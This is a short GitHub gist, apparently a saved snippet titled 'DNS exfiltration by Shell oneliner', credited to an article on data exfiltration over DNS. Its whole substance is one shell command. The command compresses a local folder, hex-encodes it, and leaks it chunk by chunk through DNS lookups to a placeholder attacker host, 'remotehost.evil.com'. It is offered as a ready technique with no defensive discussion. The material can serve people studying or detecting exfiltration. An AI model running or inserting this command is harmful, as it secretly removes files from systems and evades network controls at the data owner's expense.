Skip to content

Instantly share code, notes, and snippets.

@trolldbois
Created December 4, 2013 23:04
Show Gist options
  • Save trolldbois/7797236 to your computer and use it in GitHub Desktop.
Save trolldbois/7797236 to your computer and use it in GitHub Desktop.
DNS exfiltration by Shell oneliner
#from http://scilspace.com/content/data-exfiltration-over-dns
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.evil.com; done)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment